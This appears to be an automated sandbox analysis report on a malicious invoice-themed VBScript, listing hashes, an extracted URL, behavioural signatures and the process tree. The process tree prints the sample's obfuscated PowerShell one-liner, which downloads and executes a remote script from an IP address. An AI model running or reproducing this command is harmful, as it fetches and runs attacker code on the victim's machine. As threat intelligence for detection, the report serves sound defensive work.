Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
22-12-2024 06:45
Static task
static1
Behavioral task
behavioral1
Sample
WROO1_Invoice_Copy.js
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
WROO1_Invoice_Copy.js
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
WROO2_Invoice_Copy.vbs
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
WROO2_Invoice_Copy.vbs
Resource
win10v2004-20241007-en
General
-
Target
WROO2_Invoice_Copy.vbs
-
Size
509B
-
MD5
ac62735aa02614b0c7fee7df55e0da9b
-
SHA1
e173edb6949226372dd3eedc47d9369b26ee5577
-
SHA256
48951f6847400dd39cba2f5ba0376e08bb4b7e36a4c3567792289734758b7bf9
-
SHA512
1867116e4f375b98d653617682937fdacfd0892b5f3b3246cf612bca00407829ce55d725a4e8daf712323e9408a55d31fc2a8cc5696357ce9b4bc969de6cc709
Malware Config
Extracted
http://52.27.15.250/A/behdhdjdj.txt
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 1328 powershell.exe -
pid Process 1328 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1328 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1328 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1452 wrote to memory of 1328 1452 WScript.exe 30 PID 1452 wrote to memory of 1328 1452 WScript.exe 30 PID 1452 wrote to memory of 1328 1452 WScript.exe 30
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\WROO2_Invoice_Copy.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" &('{1}{0}'-f'X','IE')(&('{1}{0}{2}' -f'je','New-Ob','ct') ('{1}{2}{0}' -f 'WebClient','Ne','t.')).('{2}{3}{1}{0}' -f'dString','nloa','D','ow').InVoKe('http://52.27.15.250/A/behdhdjdj.txt')2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1328
-